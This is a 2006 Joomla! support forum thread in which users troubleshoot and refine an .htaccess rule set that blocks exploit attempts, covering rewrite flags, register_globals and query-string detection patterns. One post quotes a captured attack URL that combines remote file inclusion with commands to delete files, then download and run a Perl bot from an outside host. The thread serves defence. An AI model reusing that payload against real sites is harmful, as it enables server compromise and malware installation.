Discussion for: Using .htaccess files to block exploit attempts

Discussion regarding Joomla! security issues.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 18747
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Discussion for: Using .htaccess files to block exploit attempts

Post by infograf768 » Sun Jul 09, 2006 5:15 am

This condition gives a 500 server internal error here:
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [R=403,L]
Result:
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@xxxxx and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Log:
[Sun Jul  9 00:13:18 2006] [alert] [client xxx] /home/xxxpublic_html/xxx/.htaccess: RewriteRule: invalid HTTP response code for flag 'R'
Last edited by RobS on Thu Jul 13, 2006 9:40 am, edited 1 time in total.
Jean-Marie Simonet / infograf · http://www.info-graf.fr
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

User avatar
RobS
Joomla! Ace
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Sun Jul 09, 2006 5:35 am

Trying changing it to [F,L] should produce the same effect.  Which version of Apache are you running?
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 18747
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Using .htaccess files to block exploit attempts

Post by infograf768 » Sun Jul 09, 2006 5:52 am

F, L did the trick.

In the 2 cases, host and locally, Apache is 1.3.33
Jean-Marie Simonet / infograf · http://www.info-graf.fr
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 18747
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Using .htaccess files to block exploit attempts

Post by infograf768 » Sun Jul 09, 2006 5:53 am

Suggestion:

if there is no drawback, it would be good to include this in the htaccess default installed file.
Jean-Marie Simonet / infograf · http://www.info-graf.fr
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

User avatar
RobS
Joomla! Ace
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Sun Jul 09, 2006 6:00 am

I have considered that but as I said before it is largely untested so far.  Additionally, it might impede on some functionality that I have not considered yet so it would need to be thoroughly tested before I made any kind of push to get this installed in the default .htaccess.  On the other hand, I think it would be a good idea if a set of rules like this were maintained to keep up with the most popular security vulnerabilities and possibly stop them before they become bigger threats.  I have basically been trying to do that myself which has been fairly easy so far because most of the logged attacks I have seen are pretty similar in form and the code they try.  I am just worried that these rewrite conditions might create some strange behavior like the people who were having issues with mod_security and 'psy' and 'properly'.  I have tried my best to keep it sane but only testing will prove if it works or not.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

User avatar
albi
Joomla! Explorer
Joomla! Explorer
Posts: 273
Joined: Fri Aug 19, 2005 12:47 pm
Contact:

Using .htaccess files to block exploit attempts

Post by albi » Sun Jul 09, 2006 7:59 am

I will post the trick at the Greek Forum just now

Thank you
Demetris Dimarelis
http://www.e-orama.com, Web Services & Internet Marketing in Greece & Albania

User avatar
RobS
Joomla! Ace
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Sun Jul 09, 2006 8:03 am

Alright, just make sure you post a big warning that it hasn't been tested very thoroughly!
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

User avatar
albi
Joomla! Explorer
Joomla! Explorer
Posts: 273
Joined: Fri Aug 19, 2005 12:47 pm
Contact:

Using .htaccess files to block exploit attempts

Post by albi » Sun Jul 09, 2006 8:06 am

I just posted the link to your post here, because i have some hacked sites reported by the forum mebers
http://forum.joomla.org/index.php/topic ... #msg388584
thank you
Demetris Dimarelis
http://www.e-orama.com, Web Services & Internet Marketing in Greece & Albania

User avatar
RobS
Joomla! Ace
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Sun Jul 09, 2006 8:08 am

Alright, that is probably a good idea in case there are any more changes that need to be made to the script, I can just post them to this thread.  So, stay tuned J! users  ;)
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

User avatar
albi
Joomla! Explorer
Joomla! Explorer
Posts: 273
Joined: Fri Aug 19, 2005 12:47 pm
Contact:

Using .htaccess files to block exploit attempts

Post by albi » Sun Jul 09, 2006 11:18 am

Patch applied succesfully with the modification [R=403,L] to [F,L]
Demetris Dimarelis
http://www.e-orama.com, Web Services & Internet Marketing in Greece & Albania

vscribe
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 207
Joined: Thu Jun 01, 2006 3:16 pm
Location: Texas, USA
Contact:

Using .htaccess files to block exploit attempts

Post by vscribe » Sun Jul 09, 2006 1:25 pm

Hello

We are hosted at http://www.godaddy.com. I just applied the .htaccess patch and did the [F,L]

It produces the 500 Internal server error.

Any ideas?

Here is the change (making sure I actually did it correctly)

# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [R=403,F,L]


We are running 1.0.10

Thanks :(
cmsconnection.com/forum - the multi-cms forum

User avatar
infograf768
Joomla! Master
Joomla! Master
Posts: 18747
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Using .htaccess files to block exploit attempts

Post by infograf768 » Sun Jul 09, 2006 5:10 pm

@vscribe

errot in your text
It is:
RewriteRule ^(.*)$ index.php [F,L]
Jean-Marie Simonet / infograf · http://www.info-graf.fr
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

vscribe
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 207
Joined: Thu Jun 01, 2006 3:16 pm
Location: Texas, USA
Contact:

Using .htaccess files to block exploit attempts

Post by vscribe » Sun Jul 09, 2006 5:37 pm

That was it! Thank you!

I'll start testing, but looks ok now.

Thank you again - vscribe :)
cmsconnection.com/forum - the multi-cms forum

User avatar
Joomlamahesh
Joomla! Apprentice
Joomla! Apprentice
Posts: 34
Joined: Mon Nov 28, 2005 5:00 pm
Location: Mumbai, India
Contact:

Using .htaccess files to block exploit attempts

Post by Joomlamahesh » Sun Jul 09, 2006 5:42 pm

I have also applied this to my .htaccess file. Got the same internal server error that everybody is mentioning but then Changed

RewriteRule ^(.*)$ index.php [R=403,L] to

RewriteRule ^(.*)$ index.php [F,L]

Now everything is working fine at my site on http://www.khagolmandal.com

My site was also hacked on 30th June and I had to reload the whole thing. Earlier I was using 1.0.8 now I have installed 1.0.10, but as there were reports on this forum, about 1.0.10 haches also, I am using this .htaccess file.

Let see the result as I have reloaded the site since 8th July 2006.
A man is not finished when he is defeated,
He is finished when he quits

User avatar
RobS
Joomla! Ace
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Sun Jul 09, 2006 5:48 pm

I am curious, all the people that had to make the changes to the scripts last line the [F,L] part... Are you all on Apache 1.3.x?  I wrote the script on a server running 2.2.x so it might be a matter of newer syntax.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

User avatar
Joomlamahesh
Joomla! Apprentice
Joomla! Apprentice
Posts: 34
Joined: Mon Nov 28, 2005 5:00 pm
Location: Mumbai, India
Contact:

Using .htaccess files to block exploit attempts

Post by Joomlamahesh » Sun Jul 09, 2006 6:03 pm

I am on

Linux Kernel version 2.4.20-43.7.legacy
Apache version 1.3.36 (Unix)
PHP version 4.4.2
MySQL version 4.1.19-standard
A man is not finished when he is defeated,
He is finished when he quits

mwep
Joomla! Apprentice
Joomla! Apprentice
Posts: 13
Joined: Wed Mar 01, 2006 9:05 pm

Using .htaccess files to block exploit attempts

Post by mwep » Sun Jul 09, 2006 6:04 pm

Apache/1.3.36
PHP 4.4.2

User avatar
RobS
Joomla! Ace
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Sun Jul 09, 2006 6:12 pm

That is what I figured.  I edited the scripts last rule tags to [F,L] as that is compatible with more versions of Apache.  It works on 2.2.x also.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

User avatar
limestone
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 109
Joined: Fri Sep 02, 2005 7:35 pm
Location: UK

Using .htaccess files to block exploit attempts

Post by limestone » Sun Jul 09, 2006 11:36 pm

I just updated htaccess on 3 sites on 2 servers with (apparently) no ill effects. Anything that helps block these exploits must be a good thing and thanks to RobS for that.

Just a thought - my knowledge of what you can and can't do with htaccess is sketchy at best - if these additions do block any attacks we won't know about it. Is there any way for attempts to be logged?

User avatar
RobS
Joomla! Ace
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Sun Jul 09, 2006 11:46 pm

It should log a 403 error for index.php in your log file.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

User avatar
RobinH
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 177
Joined: Mon Sep 19, 2005 6:29 pm
Location: Lake Norman, North Carolina, USA

Using .htaccess files to block exploit attempts

Post by RobinH » Mon Jul 10, 2006 12:05 am

Your .htaccess hack worked fine on my server, and it's got the latest of everything as I just upgraded all the server software plus all Apache attributes in the last month (boy was that fun).

Question for you - I've also seen some comments about changing Register Globals: ON to Register Globals: OFF, but isn't that a part of the php.ini file?  I do know that this does help deter some hacks, but if it's in the root php.ini file then that would affect any php files on the server.  Is there a way of doing this in the .htaccess file?  I'm sure there is but as others have mentioned, the .htaccess file and how it's set up is almost a mystery...

Oh and thanks for this tip!!!

friesengeist
Joomla! Guru
Joomla! Guru
Posts: 842
Joined: Sat Sep 10, 2005 10:31 pm

Using .htaccess files to block exploit attempts

Post by friesengeist » Mon Jul 10, 2006 12:10 am

RobinH wrote: Question for you - I've also seen some comments about changing Register Globals: ON to Register Globals: OFF, but isn't that a part of the php.ini file?  I do know that this does help deter some hacks, but if it's in the root php.ini file then that would affect any php files on the server.  Is there a way of doing this in the .htaccess file?  I'm sure there is but as others have mentioned, the .htaccess file and how it's set up is almost a mystery...
As of Joomla! 1.0.4, you can change your "emulated" setting of register_globals in /globals.php. So if you don't have access to this setting in your sever config, you can at least emulate it for Joomla!

Code: Select all

/**
 * Use 1 to emulate register_globals = on
 * 
 * Use 0 to emulate regsiter_globals = off
 */
define( 'RG_EMULATION', 1 );
We may not be able to control the wind, but we can always adjust our sails

User avatar
RobinH
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 177
Joined: Mon Sep 19, 2005 6:29 pm
Location: Lake Norman, North Carolina, USA

Using .htaccess files to block exploit attempts

Post by RobinH » Mon Jul 10, 2006 12:15 am

Ahhh did find it there. Have hesitiated to change my php.ini file as I'm not sure of the affect on all the other packages I have running. Afraid if I turn Register Globals off it'll have some affect other than what I want.  I guess I should try it just to see.

I did see this script in my globals.php file, thanks for the hint.

User avatar
RobS
Joomla! Ace
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Mon Jul 10, 2006 12:16 am

RobinH wrote: Question for you - I've also seen some comments about changing Register Globals: ON to Register Globals: OFF, but isn't that a part of the php.ini file?  I do know that this does help deter some hacks, but if it's in the root php.ini file then that would affect any php files on the server.  Is there a way of doing this in the .htaccess file?  I'm sure there is but as others have mentioned, the .htaccess file and how it's set up is almost a mystery...
Try putting this code in your .htaccess I have not tested this though.  It might work it might not, it depends on how php is configured I imagine.

php_flag register_globals off
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

peacypeace
Joomla! Apprentice
Joomla! Apprentice
Posts: 17
Joined: Mon Jun 05, 2006 7:28 am
Location: jordan-amman
Contact:

Using .htaccess files to block exploit attempts

Post by peacypeace » Mon Jul 10, 2006 7:36 am

I'm working with IIS 5.1 (Windows XP) ....Can i use the .htaccess file you wrote...if not how can i solve the problem... I got hacked once already...i did all i can to tighten security on the IIS...

Thanx in advance
Life is your playground ,but it's my school...

User avatar
RobS
Joomla! Ace
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Mon Jul 10, 2006 7:44 am

It should work.  Let me know how it goes if you decide to try it.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

friesengeist
Joomla! Guru
Joomla! Guru
Posts: 842
Joined: Sat Sep 10, 2005 10:31 pm

Using .htaccess files to block exploit attempts

Post by friesengeist » Mon Jul 10, 2006 8:03 am

Hi Robert,
first off all, many thanks for taking the time to come up with this!

Some small suggestions:
RobS wrote:

Code: Select all

# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
As globals.php already deals with this, I think one could strip this from your .htaccess.
RobS wrote:

Code: Select all

# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
$_REQUEST is an array of user input anyway, so why should we want to make sure a user doesn't mess around with it?

Both remarks are not really important. The thing is, every regexp takes some time to execute, so I think we should try to do as little as possible. It's probably only a matter of microseconds (or even less), but still, that all sums up at some point...

Thanks again for your work on this!
We may not be able to control the wind, but we can always adjust our sails

User avatar
albi
Joomla! Explorer
Joomla! Explorer
Posts: 273
Joined: Fri Aug 19, 2005 12:47 pm
Contact:

Using .htaccess files to block exploit attempts

Post by albi » Mon Jul 10, 2006 8:12 am

I used it at one of my sites ith no success

the site was hacked last night.

I think thay used the vulnerability at extcalendar but i m not sure about this

http://forum.joomla.org/index.php/topic ... #msg389163
Last edited by albi on Mon Jul 10, 2006 8:32 am, edited 1 time in total.
Demetris Dimarelis
http://www.e-orama.com, Web Services & Internet Marketing in Greece & Albania

User avatar
RobS
Joomla! Ace
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Mon Jul 10, 2006 8:32 am

friesengeist wrote:
As globals.php already deals with this, I think one could strip this from your .htaccess.


$_REQUEST is an array of user input anyway, so why should we want to make sure a user doesn't mess around with it?

Both remarks are not really important. The thing is, every regexp takes some time to execute, so I think we should try to do as little as possible. It's probably only a matter of microseconds (or even less), but still, that all sums up at some point...

Thanks again for your work on this!
Honestly, I am not up to date on the function of globals.php.  I hadn't really looked at what it does/how it works.  I will have to read up on it.  As for the comment on the $_REQUEST array, I included it I guess as double protection against scripts like this:

Code: Select all

/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%
5d=1&GLOBALS=&mosConfig_absolute_path=http://bbs.mbig.cn/tool.gif?&cmd=cd%20/tmp/;rm%20-rf%20*;fetch%
20http://bbs.mbig.cn/bt.pl;wget%20http://bbs.mbig.cn/bt.pl;curl%20-O%20http://bbs.mbig.cn/bt.pl;perl%20bt.pl;perl%
20bt.pl.1;perl%20bt.pl.2?
And from what I understand you can access $_COOKIE through $_REQUEST which might be worth attempting to protect against to prevent some kind of session hijacking via hand crafted cookie values.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

User avatar
RobS
Joomla! Ace
Joomla! Ace
Posts: 1367
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA
Contact:

Using .htaccess files to block exploit attempts

Post by RobS » Mon Jul 10, 2006 8:34 am

albi wrote: I used it at one of my sites ith no success

the site was hacked last night.

I think thay used the vulnerability at extcalendar but i m not sure about this

http://forum.joomla.org/index.php/topic ... #msg389163
Albi, if you could look through your logs and find the exploit that they used I would be happy to attempt to address it via a rewrite rule. 
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Locked

Return to “Security - 1.0.x”